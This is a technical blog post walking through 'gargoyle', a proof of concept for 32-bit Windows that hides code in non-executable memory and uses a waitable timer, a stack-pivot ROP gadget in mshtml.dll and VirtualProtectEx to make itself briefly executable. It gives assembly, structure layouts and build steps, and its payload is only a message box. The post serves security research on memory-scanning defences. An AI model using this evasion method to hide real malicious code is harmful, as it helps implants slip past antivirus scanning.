gargoyle is a technique for hiding all of a program’s executable code in non-executable memory. At some programmer-defined interval, gargoyle wakes up, uses some ROP trickery to mark itself executable, and does some work.
The technique is demonstrated for 32-bit Windows here. In this post, we’ll dig through all the gritty details of how it’s implemented.
Live memory analysis
Performing live memory analysis can be a really expensive operation. If you use Windows Defender, you may have been on the business end of this problem (just Google “Antimalware Service Executable”). Since a program’s code must reside in executable memory to run, a common technique for reducing the computational burden is to limit analysis to executable pages. In many processes, this reduces the amount of memory to analyze by an order of magnitude.
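To make the heuristic concrete, here is a minimal C++ sketch of a scanner that only inspects executable regions. The Region type and the function names are hypothetical. The PAGE_* values are the ones defined in winnt.h. A region whose protection is PAGE_READWRITE contributes nothing to the scan, and that is exactly the gap gargoyle exploits.

```cpp
#include <cassert>
#include <cstdint>
#include <string>
#include <vector>

// Windows page-protection constants (values as defined in winnt.h).
constexpr uint32_t PAGE_READWRITE         = 0x04;
constexpr uint32_t PAGE_EXECUTE           = 0x10;
constexpr uint32_t PAGE_EXECUTE_READ      = 0x20;
constexpr uint32_t PAGE_EXECUTE_READWRITE = 0x40;
constexpr uint32_t PAGE_EXECUTE_WRITECOPY = 0x80;

// Hypothetical description of one committed region in a process.
struct Region {
    std::string name;
    uint64_t size;        // bytes
    uint32_t protection;  // one PAGE_* value
};

// True if any of the PAGE_EXECUTE* bits is set.
bool is_executable(uint32_t protection) {
    return (protection & (PAGE_EXECUTE | PAGE_EXECUTE_READ |
                          PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)) != 0;
}

// The "executable pages only" heuristic: total bytes a scanner would inspect.
uint64_t bytes_to_scan(const std::vector<Region>& regions) {
    uint64_t total = 0;
    for (const Region& r : regions)
        if (is_executable(r.protection)) total += r.size;
    return total;
}
```

While gargoyle sleeps, its region is marked PAGE_READWRITE and is skipped entirely. It is only counted during the brief window when it is marked PAGE_EXECUTE_READ.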
gargoyle demonstrates that this is a risky approach. Using Windows Asynchronous Procedure Calls (APCs), code that sits in read/write memory can be made executable just long enough to perform some tasks. Once its tasks are done, gargoyle marks its memory read/write (non-executable) again and waits until a timer expires. Then the loop repeats.
Of course, there’s no InvokeNonExecutableMemoryOnTimerEx Windows API. Getting the loop going requires some work…
Windows Asynchronous Procedure Calls (APC)
Asynchronous programming allows a task to be executed at a later time, potentially in the context of a separate thread of execution. Each thread has its own APC queue. When a thread enters an alertable state, Windows dispatches the queued APCs to that thread.
There are a bunch of ways to queue APCs:
- QueueUserAPC
- ReadFileEx
- WriteFileEx
- SetWaitableTimer
- SetWaitableTimerEx
And a bunch of ways to enter an alertable state:
- SleepEx
- SignalObjectAndWait
- MsgWaitForMultipleObjectsEx
- WaitForMultipleObjectsEx
- WaitForSingleObjectEx
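The queue-then-dispatch behavior can be modeled in a few lines. This is a toy simulation, not how Windows implements APCs. SimulatedThread and its methods are hypothetical names. A real alertable wait also returns WAIT_IO_COMPLETION after running the APCs, and this model does not capture that.

```cpp
#include <cassert>
#include <cstddef>
#include <deque>
#include <functional>
#include <utility>

// Toy model of one thread's user-mode APC queue: APCs accumulate and only
// run when the thread performs an alertable wait (e.g. SleepEx(..., TRUE)).
class SimulatedThread {
public:
    // Analogous to QueueUserAPC or a timer queuing its completion routine.
    void queue_apc(std::function<void()> apc) { queue_.push_back(std::move(apc)); }

    // Non-alertable wait: queued APCs stay queued.
    void wait() {}

    // Alertable wait: run everything in the queue and report how many ran.
    int alertable_wait() {
        int ran = 0;
        while (!queue_.empty()) {
            std::function<void()> apc = std::move(queue_.front());
            queue_.pop_front();
            apc();
            ++ran;
        }
        return ran;
    }

    std::size_t pending() const { return queue_.size(); }

private:
    std::deque<std::function<void()>> queue_;
};
```

The important property for gargoyle is the asymmetry: nothing runs until the thread itself chooses to wait alertably.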
The combination we’ll be employing is to create a timer with CreateWaitableTimer and then queue APCs with SetWaitableTimer:
HANDLE WINAPI CreateWaitableTimer(
_In_opt_ LPSECURITY_ATTRIBUTES lpTimerAttributes,
_In_ BOOL bManualReset,
_In_opt_ LPCTSTR lpTimerName
);
The default security attributes are fine, we don’t want a manual-reset timer, and we don’t want a named timer. So all of the arguments to CreateWaitableTimer are 0 or nullptr. This function returns a HANDLE to our newly minted timer. Next, we must configure it:
BOOL WINAPI SetWaitableTimer(
_In_ HANDLE hTimer,
_In_ const LARGE_INTEGER *pDueTime,
_In_ LONG lPeriod,
_In_opt_ PTIMERAPCROUTINE pfnCompletionRoutine,
_In_opt_ LPVOID lpArgToCompletionRoutine,
_In_ BOOL fResume
);
The first argument is the handle we got from CreateWaitableTimer. The pDueTime argument is a pointer to a LARGE_INTEGER that specifies the time of the first timer expiry. For the example, we simply zero this out (expire immediately). The lPeriod argument defines the expiration interval in milliseconds, which determines how often gargoyle is invoked.
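Here is a sketch of the timing arithmetic. It follows the documented pDueTime convention: values are in 100-nanosecond units, negative values are relative to the current time, and positive values are absolute. Both helper names are hypothetical. The gargoyle harness passes a zeroed due time instead, and as an absolute time that lies far in the past, so the first expiry is immediate.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Relative due time for SetWaitableTimer: negative, in 100 ns units.
// 1 ms = 10,000 x 100 ns. (Hypothetical helper name.)
int64_t relative_due_time(uint32_t milliseconds) {
    return -static_cast<int64_t>(milliseconds) * 10000;
}

// Times (ms after arming) of the first `count` expirations of a periodic
// timer with the given first delay and lPeriod. Pure arithmetic model.
std::vector<uint64_t> expiry_schedule(uint64_t first_ms, uint32_t period_ms, int count) {
    assert(count >= 0);
    std::vector<uint64_t> times;
    for (int i = 0; i < count; ++i)
        times.push_back(first_ms + static_cast<uint64_t>(i) * period_ms);
    return times;
}
```

With a due time of 0 and an lPeriod of 15000, gargoyle runs right away and then roughly every 15 seconds.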
The next argument, pfnCompletionRoutine, will be the subject of some considerable effort on our part. This is the address that Windows calls from the waiting thread. Sounds simple, except that none of gargoyle’s code is in executable memory at the time the APC is dispatched. If we were to point pfnCompletionRoutine at gargoyle, we’d end up with a data execution prevention (DEP) violation. Weird, I know.
Instead, we point pfnCompletionRoutine at an exotic kind of ROP gadget. It pivots the executing thread’s stack pointer to the value of lpArgToCompletionRoutine, the next argument to SetWaitableTimer. When the ROP gadget executes its ret, the specially crafted stack helpfully calls into VirtualProtectEx to mark gargoyle executable before tail-calling into gargoyle’s first instruction.
The last argument, fResume, controls whether to wake up a suspended (sleeping) computer when the timer expires. We set this to false for this proof of concept.
Windows Data Execution Prevention and VirtualProtectEx
The final piece is the venerable VirtualProtectEx, which changes the protection attributes of a region of memory in a given process:
BOOL WINAPI VirtualProtectEx(
_In_ HANDLE hProcess,
_In_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flNewProtect,
_Out_ PDWORD lpflOldProtect
);
We are going to call VirtualProtectEx in two contexts: after gargoyle has completed executing (before we make the thread alertable) and before gargoyle starts executing (after the thread has been dispatched for APC completion). See the infographic for more details.
In this proof of concept, we keep gargoyle, the trampoline, the ROP gadget, and our read/write memory all in the same process. So the first argument, hProcess, can be set to the pseudo-handle returned by GetCurrentProcess ((HANDLE)-1, which is 0xffffffff on 32-bit Windows). The next argument, lpAddress, corresponds to the address of gargoyle, and dwSize corresponds to the size of gargoyle’s executable memory. We provide the desired protection attributes in flNewProtect. We don’t care about the old protection attributes, but unfortunately lpflOldProtect is not an optional argument. So we point it at some empty memory we’ve set aside.
The only argument that differs depending on context is flNewProtect. When gargoyle goes to sleep, we want to mark it PAGE_READWRITE (0x04). Before gargoyle gains execution, we want to mark it PAGE_EXECUTE_READ (0x20).
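The two contexts differ only in flNewProtect, which the following sketch makes explicit. Addresses are modeled as 32-bit integers. The VirtualProtectArgs type, the Phase enum, and the make_args helper are hypothetical names used for illustration.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint32_t PAGE_READWRITE    = 0x04;
constexpr uint32_t PAGE_EXECUTE_READ = 0x20;
// GetCurrentProcess() returns the pseudo-handle (HANDLE)-1, i.e. 0xFFFFFFFF
// on 32-bit Windows.
constexpr uint32_t CURRENT_PROCESS_PSEUDO_HANDLE = 0xFFFFFFFF;

enum class Phase { GoingToSleep, AboutToRun };

// 32-bit view of VirtualProtectEx's five arguments (hypothetical type).
struct VirtualProtectArgs {
    uint32_t hProcess, lpAddress, dwSize, flNewProtect, lpflOldProtect;
};

// Everything except flNewProtect is the same in both contexts.
VirtualProtectArgs make_args(Phase phase, uint32_t pic_addr, uint32_t pic_size,
                             uint32_t scratch_addr) {
    uint32_t prot = (phase == Phase::GoingToSleep) ? PAGE_READWRITE : PAGE_EXECUTE_READ;
    return {CURRENT_PROCESS_PSEUDO_HANDLE, pic_addr, pic_size, prot, scratch_addr};
}
```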
The Stack Trampoline
Note: If you are not familiar with x86 calling conventions, this section will be hard to understand. See my post on x86 calling conventions for a refresher.
In the usual case, ROP gadgets are used to defeat DEP by doing a little bit of work at a time to build up a call into VirtualProtectEx. That call might mark the stack executable, for example, and then tail-call to an address on the stack. This is often useful in exploit development, when an attacker can write to non-executable memory and needs a way to animate it. It is possible to chain many ROP gadgets together to do quite a bit of work.
Unfortunately, we do not have control over very much of the context of our alerted thread. We can control (a) the instruction pointer eip via pfnCompletionRoutine and (b) a pointer on the stack of the alerted thread at location esp+4. That pointer is the first argument to the invoked function, since it is a WINAPI/__stdcall callback.
Fortunately, we already have full execution before the APC even gets queued. So we can carefully craft a new stack (a stack trampoline) for our alerted thread. Our strategy is to find a ROP gadget that sets esp to point at our stack trampoline. Anything of the following form would work:
pop * ; Some instruction that adds 4 to esp
pop esp
ret
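It’s a little exotic, since functions don’t usually end with pop esp/ret. However, the gadget doesn’t have to be an instruction sequence the compiler intended. Intel x86 has variable-length opcodes, which make for very dense executable memory, so decoding from an arbitrary byte offset often yields useful instructions. Anyway, there’s one such gadget in 32-bit mshtml.dll at offset 7165405 (0x6D55DD) from base. The offset is specific to a particular build of the DLL: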
pop ecx
pop esp
ret
Note: Thanks to Sascha Schirra’s excellent Ropper tool.
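Ropper is the right tool for finding gadgets in practice, but the core idea fits in a few lines: scan every byte offset, not just the intended instruction boundaries, for the encoding of pop r32; pop esp; ret. In x86, pop r32 encodes as 0x58 plus the register number (0x59 is pop ecx, 0x5C is pop esp), and a near ret is 0xC3. The find_pivot_gadgets helper below is hypothetical. It only matches that exact three-byte form and ignores other instructions that add 4 to esp.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Return every offset where "pop r32 ; pop esp ; ret" begins.
// 0x5C is excluded as the first byte: "pop esp" there would load the
// APC return address into esp instead of skipping it.
std::vector<std::size_t> find_pivot_gadgets(const std::vector<uint8_t>& code) {
    std::vector<std::size_t> hits;
    for (std::size_t i = 0; i + 2 < code.size(); ++i) {
        uint8_t first = code[i];
        bool pop_r32 = first >= 0x58 && first <= 0x5F && first != 0x5C;
        if (pop_r32 && code[i + 1] == 0x5C && code[i + 2] == 0xC3)
            hits.push_back(i);
    }
    return hits;
}
```

Running this over a DLL’s mapped code section would report the mshtml.dll gadget as the byte sequence 59 5C C3.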
This gadget will set esp equal to whatever value we put into lpArgToCompletionRoutine when we called SetWaitableTimer. All that’s left to do now is have lpArgToCompletionRoutine point to some carefully crafted memory that looks like a stack. This stack trampoline looks like this:
struct StackTrampoline {
void* VirtualProtectEx; // <-- ESP here; ROP gadget rets
void* return_address; // Tail-call to gargoyle
void* current_process; // First arg to VirtualProtectEx
void* address;
uint32_t size;
uint32_t protections;
void* old_protections_ptr; // Last arg to VirtualProtectEx
uint32_t old_protections; // Storage that old_protections_ptr points at
void* setup_config; // First argument to gargoyle
};
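Because the trampoline is consumed as raw stack memory, its field offsets matter. The sketch below models the 32-bit layout with uint32_t fields, so it compiles to the same offsets on a 64-bit host, and then fills it in. StackTrampoline32 and build_trampoline are hypothetical names. Pointing old_protections_ptr at the trampoline’s own old_protections field is an assumption about where the “empty memory” lives.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// 32-bit model of StackTrampoline: one dword per slot.
struct StackTrampoline32 {
    uint32_t VirtualProtectEx;     // the gadget's ret lands here
    uint32_t return_address;       // VirtualProtectEx returns into gargoyle
    uint32_t current_process;      // hProcess
    uint32_t address;              // lpAddress
    uint32_t size;                 // dwSize
    uint32_t protections;          // flNewProtect
    uint32_t old_protections_ptr;  // lpflOldProtect (last argument)
    uint32_t old_protections;      // storage that old_protections_ptr targets
    uint32_t setup_config;         // gargoyle's first argument
};

static_assert(offsetof(StackTrampoline32, return_address) == 4, "slot 1");
static_assert(offsetof(StackTrampoline32, old_protections) == 28, "slot 7");
static_assert(offsetof(StackTrampoline32, setup_config) == 32, "slot 8");
static_assert(sizeof(StackTrampoline32) == 36, "nine dwords");

// Fill a trampoline that will live at address `tramp_addr` (hypothetical helper).
StackTrampoline32 build_trampoline(uint32_t tramp_addr, uint32_t vpex, uint32_t pic,
                                   uint32_t pic_size, uint32_t config) {
    StackTrampoline32 t{};
    t.VirtualProtectEx = vpex;
    t.return_address = pic;          // tail-call into gargoyle
    t.current_process = 0xFFFFFFFF;  // GetCurrentProcess() pseudo-handle
    t.address = pic;
    t.size = pic_size;
    t.protections = 0x20;            // PAGE_EXECUTE_READ
    t.old_protections_ptr =
        tramp_addr + static_cast<uint32_t>(offsetof(StackTrampoline32, old_protections));
    t.setup_config = config;
    return t;
}
```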
We set lpArgToCompletionRoutine equal to the address of the void* VirtualProtectEx field. That way, when the ROP gadget rets, VirtualProtectEx gets called. When VirtualProtectEx receives this call, esp will be pointing at void* return_address. We’ve conveniently set this to (you guessed it) our now-executable gargoyle, and Bob’s your uncle!
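The pivot can be traced with a toy stack machine. The sketch below simulates three steps: the APC call into the gadget, the gadget itself, and VirtualProtectEx’s __stdcall return, which discards 20 bytes of arguments. All addresses are made up, and Machine is a hypothetical type. The model does not capture what VirtualProtectEx does internally.

```cpp
#include <cassert>
#include <cstdint>
#include <map>

// Minimal 32-bit stack machine: just enough to trace the pivot.
struct Machine {
    std::map<uint32_t, uint32_t> mem;  // dword-addressed memory
    uint32_t esp = 0, eip = 0, ecx = 0;

    void push(uint32_t v) { esp -= 4; mem[esp] = v; }
    uint32_t pop() { uint32_t v = mem[esp]; esp += 4; return v; }

    // pop ecx ; pop esp ; ret
    void run_gadget() {
        ecx = pop();     // discards the APC return address
        esp = mem[esp];  // pop esp: esp takes the loaded value
        eip = pop();     // ret
    }

    // Return from a __stdcall function that takes `arg_bytes` of arguments.
    void stdcall_return(uint32_t arg_bytes) {
        eip = pop();
        esp += arg_bytes;
    }
};
```

After the final step, esp sits on old_protections and [esp+4] holds setup_config, which is what gargoyle’s first instruction reads.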
gargoyle
Let’s pause for a moment and take a look at the read/write Workspace we set up before creating the timer and kicking off the loop. The Workspace contains three main components: some configuration to help gargoyle bootstrap itself, stack space, and the StackTrampoline:
struct Workspace {
SetupConfiguration config;
uint8_t stack[stack_size];
StackTrampoline tramp;
};
You’ve already seen the StackTrampoline, and stack is just a chunk of memory. The SetupConfiguration looks like this:
struct SetupConfiguration {
uint32_t initialized;
void* setup_address;
uint32_t setup_length;
void* VirtualProtectEx;
void* WaitForSingleObjectEx;
void* CreateWaitableTimer;
void* SetWaitableTimer;
void* MessageBox;
void* tramp_addr;
void* sleep_handle;
uint32_t interval;
void* target;
uint8_t shadow[8];
};
Inside of the proof of concept harness in main.cpp, the SetupConfiguration is set up this way:
config.setup_address = setup_memory; // Address of gargoyle
config.setup_length = static_cast<uint32_t>(setup_size);
config.VirtualProtectEx = VirtualProtectEx;
config.WaitForSingleObjectEx = WaitForSingleObjectEx;
config.CreateWaitableTimer = CreateWaitableTimerW;
config.SetWaitableTimer = SetWaitableTimer;
config.MessageBox = MessageBoxA;
config.tramp_addr = &tramp; // Address of stack trampoline
config.interval = invocation_interval_ms; // e.g. 15000
config.target = gadget_memory; // Address of ROP gadget
Pretty simple. It’s basically just pointers to various Windows functions and some helpful arguments.
Now that you have an idea of what the Workspace looks like, let’s get back to gargoyle. Once the stack trampoline has invoked VirtualProtectEx and the tail call kicks in, gargoyle has execution. At this point, esp is pointing at old_protections. That is because VirtualProtectEx is WINAPI/__stdcall and pops its own arguments before returning.
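Notice we’ve put an extra field, void* setup_config, at the end of StackTrampoline. It is conveniently placed as if it were the first argument to gargoyle invoked as a __cdecl/__stdcall function, with old_protections sitting in the return-address slot.
The assembly below accesses the Workspace through a NASM Configuration structure whose field names differ slightly from the C++ ones. Its setup_addr, trampoline_addr, and gadget fields correspond to setup_address, tramp_addr, and target, and Configuration.trampoline is the first slot of the StackTrampoline. The extra field allows gargoyle to find its read/write configuration in memory: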
mov ebx, [esp+4] ; Configuration in ebx now
lea esp, [ebx + Configuration.trampoline - 4] ; Bottom of "stack"
mov ebp, esp
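The effect of lea esp, [ebx + Configuration.trampoline - 4] can be checked against a 32-bit model of the Workspace. This sketch assumes stack_size is 0x10000, because a comment later in the assembly describes the stack as about 65k. It also models pointers as uint32_t and uses hypothetical *32 type names.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

constexpr std::size_t stack_size = 0x10000;  // assumption: 64 KiB

// 32-bit models (pointers as uint32_t) of the harness structures.
struct SetupConfiguration32 {
    uint32_t initialized, setup_address, setup_length;
    uint32_t VirtualProtectEx, WaitForSingleObjectEx, CreateWaitableTimer,
             SetWaitableTimer, MessageBox;
    uint32_t tramp_addr, sleep_handle, interval, target;
    uint8_t shadow[8];
};

struct Workspace32 {
    SetupConfiguration32 config;
    uint8_t stack[stack_size];
    uint32_t tramp[9];  // the nine StackTrampoline slots
};

// esp after `lea esp, [ebx + Configuration.trampoline - 4]`, with ebx holding
// the Workspace base: the last dword of `stack`, since the stack grows down.
uint32_t initial_esp(uint32_t workspace_base) {
    return workspace_base + static_cast<uint32_t>(offsetof(Workspace32, tramp)) - 4;
}
```

Any push gargoyle makes from here moves esp down into stack and never touches the trampoline above it.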
Now we’re ready to rock. esp is pointing at the last dword of Workspace.stack (its highest address, since the stack grows down), and ebx holds a pointer to the Configuration object. If this is the first time gargoyle is called, we’ll need to set up the timer. We check for this by looking up the initialized field on Configuration. If gargoyle is already initialized, we jump past all the timer setup:
; If we're initialized, skip to trampoline fixup
mov edx, [ebx + Configuration.initialized]
cmp edx, 0
jne reset_trampoline
; Create the timer
push 0
push 0
push 0
mov ecx, [ebx + Configuration.CreateWaitableTimer]
call ecx
mov [ebx + Configuration.sleep_handle], eax
; Set the timer
push 0
mov ecx, [ebx + Configuration.trampoline_addr]
push ecx
mov ecx, [ebx + Configuration.gadget]
push ecx
mov ecx, [ebx + Configuration.interval]
push ecx
lea ecx, [ebx + Configuration.shadow]
push ecx
mov ecx, [ebx + Configuration.sleep_handle]
push ecx
mov ecx, [ebx + Configuration.SetWaitableTimer]
call ecx
; Set the initialized bit
mov [ebx + Configuration.initialized], dword 1
; Replace the return address on our trampoline
reset_trampoline:
mov ecx, [ebx + Configuration.VirtualProtectEx]
mov [ebx + Configuration.trampoline], ecx
Notice that at reset_trampoline we reinstall the address of VirtualProtectEx onto the stack trampoline. After the ROP gadget rets, VirtualProtectEx executes with esp pointing just past that slot. From its point of view the slot is free stack space, so it clobbers the slot during normal function execution, for example when its prologue pushes a register.
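Here is a toy illustration of why the slot must be reinstalled on every pass. It assumes, for illustration only, that VirtualProtectEx’s first write to the stack is a push ebp. Any push from a callee whose esp sits just above the slot has the same effect. Stack32 and both functions are hypothetical.

```cpp
#include <cassert>
#include <cstdint>
#include <map>

// Toy dword memory plus stack pointer (a model, not Windows).
struct Stack32 {
    std::map<uint32_t, uint32_t> mem;
    uint32_t esp = 0;
    void push(uint32_t v) { esp -= 4; mem[esp] = v; }
};

// After the gadget's ret consumes slot 0 at `tramp`, esp == tramp + 4, so a
// callee's first push writes straight over slot 0.
void simulate_callee_prologue(Stack32& s, uint32_t saved_ebp) { s.push(saved_ebp); }

// What reset_trampoline does: write the function address back into slot 0.
void reset_trampoline(Stack32& s, uint32_t tramp, uint32_t vpex) { s.mem[tramp] = vpex; }
```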
At this point, you get to execute arbitrary code. For the proof of concept, we pop a message box:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; Arbitrary code goes here. Note that the
;;;; default stack is pretty small (65k).
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Pop a MessageBox as example
push 0 ; null
push 0x656c796f ; oyle
push 0x67726167 ; garg
mov ecx, esp
push 0x40 ; Info box
push ecx ; ptr to 'gargoyle' on stack
push ecx ; ptr to 'gargoyle' on stack
push 0
mov ecx, [ebx + Configuration.MessageBox]
call ecx
mov esp, ebp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
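The three pushes before mov ecx, esp build the string "gargoyle" on the stack. x86 is little-endian and the stack grows down, so the dwords are pushed in reverse order, each holding four characters with the first character in the low byte. The hypothetical push_order helper below reproduces the constants in the listing.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Pack a NUL-terminated string into little-endian dwords in push order, so
// that after all pushes esp points at the first character.
std::vector<uint32_t> push_order(const std::string& s) {
    std::string padded = s;
    padded.push_back('\0');  // terminator
    while (padded.size() % 4 != 0) padded.push_back('\0');
    std::vector<uint32_t> dwords;
    // Walk from the end of the string so the last chunk is pushed first.
    for (std::size_t i = padded.size(); i >= 4; i -= 4) {
        uint32_t v = 0;
        for (int b = 3; b >= 0; --b)
            v = (v << 8) | static_cast<uint8_t>(padded[i - 4 + b]);
        dwords.push_back(v);
    }
    return dwords;
}
```

For "gargoyle" this yields 0, 0x656c796f, 0x67726167, matching the push 0 / push 0x656c796f / push 0x67726167 sequence above.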
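Once we’re done executing, we need to set up our tail calls to VirtualProtectEx and then WaitForSingleObjectEx. We actually set up two calls to WaitForSingleObjectEx, since the APC will return from the first and continue executing. VirtualProtectEx returns into the first wait, the first wait returns into the second, and the second wait’s return address (0) is never used. This enables us to loop APCs indefinitely: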
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; Time to setup tail calls to go down
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Setup arguments for WaitForSingleObjectEx x1
push 1
push 0xFFFFFFFF
mov ecx, [ebx + Configuration.sleep_handle]
push ecx
push 0 ; Return address never ret'd
; Setup arguments for WaitForSingleObjectEx x2
push 1
push 0xFFFFFFFF
mov ecx, [ebx + Configuration.sleep_handle]
push ecx
; Tail call to WaitForSingleObjectEx
mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
push ecx
; Setup arguments for VirtualProtectEx
lea ecx, [ebx + Configuration.shadow]
push ecx
push 4 ; PAGE_READWRITE
mov ecx, [ebx + Configuration.setup_length]
push ecx
mov ecx, [ebx + Configuration.setup_addr]
push ecx
push dword 0xffffffff
; Tail call to WaitForSingleObjectEx
mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
push ecx
; Jump to VirtualProtectEx
mov ecx, [ebx + Configuration.VirtualProtectEx]
jmp ecx
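This push sequence is easy to get wrong, so here is a sketch that rebuilds it and follows the __stdcall returns symbolically. It assumes each call simply returns. In the real loop, the first wait is where the timer APC arrives. All addresses and names are hypothetical; only the push order mirrors the listing.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Symbolic stand-ins (hypothetical values) for addresses and constants.
constexpr uint32_t kVirtualProtectEx = 0x1000;
constexpr uint32_t kWaitForSingleObjectEx = 0x2000;
constexpr uint32_t kCurrentProcess = 0xFFFFFFFF;  // GetCurrentProcess() pseudo-handle
constexpr uint32_t kInfinite = 0xFFFFFFFF;        // INFINITE timeout
constexpr uint32_t kSleepHandle = 0x44;

// Stack of dwords; back() is the top of the stack (lowest address).
struct Chain {
    std::vector<uint32_t> s;
    void push(uint32_t v) { s.push_back(v); }
    uint32_t pop() { uint32_t v = s.back(); s.pop_back(); return v; }
    uint32_t peek(std::size_t i) const { return s[s.size() - 1 - i]; }  // i-th from top
    void drop(std::size_t n) { s.resize(s.size() - n); }
};

// Same push order as the assembly listing.
Chain build_chain(uint32_t pic, uint32_t pic_len, uint32_t shadow, uint32_t prot) {
    Chain c;
    c.push(1); c.push(kInfinite); c.push(kSleepHandle);  // args of the second wait
    c.push(0);                                           // second wait's return (never used)
    c.push(1); c.push(kInfinite); c.push(kSleepHandle);  // args of the first wait
    c.push(kWaitForSingleObjectEx);                      // first wait returns into the second
    c.push(shadow); c.push(prot); c.push(pic_len); c.push(pic); c.push(kCurrentProcess);
    c.push(kWaitForSingleObjectEx);                      // VirtualProtectEx returns here
    return c;
}

struct Call { uint32_t fn; std::vector<uint32_t> args; };

// Starting at `jmp VirtualProtectEx`: each callee finds its return address on
// top and its arguments above it, and `ret n` pops both.
std::vector<Call> trace(Chain c) {
    std::vector<Call> calls;
    uint32_t fn = kVirtualProtectEx;
    while (fn != 0) {  // 0 is the dummy return address: stop there
        std::size_t nargs = (fn == kVirtualProtectEx) ? 5 : 3;
        uint32_t ret = c.pop();
        Call call{fn, {}};
        for (std::size_t i = 0; i < nargs; ++i) call.args.push_back(c.peek(i));
        c.drop(nargs);
        calls.push_back(call);
        fn = ret;
    }
    return calls;
}
```

The trace visits VirtualProtectEx, then WaitForSingleObjectEx twice, each time with (sleep_handle, INFINITE, TRUE). That is the ordering the prose describes.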
Trying it out
The source for the proof of concept is on GitHub and you can try it out easily, but you must have the following installed:
- Visual Studio: 2015 Community is tested, but it may work for other versions.
- Netwide Assembler: v2.12.02 x64 is tested, but it may work for other versions. Make sure nasm.exe is on your path.
Clone gargoyle:
git clone https://github.com/JLospinoso/gargoyle.git
Open Gargoyle.sln and build.
You must run gargoyle.exe in the same directory as setup.pic. By default, both end up in Debug or Release, the output directories of the solution.
Every 15 seconds, gargoyle will pop up a message box. When you click OK, gargoyle completes with the VirtualProtectEx/WaitForSingleObjectEx tail call.
For fun, use Sysinternals’ excellent VMMap tool to examine when gargoyle’s position-independent code (PIC) is executable. If a message box is active, gargoyle will be executable. If it is not, gargoyle should not be executable. The PIC’s address is printed to stdout just before the harness calls into the PIC.
Feedback
Please post any issues or bugs you find!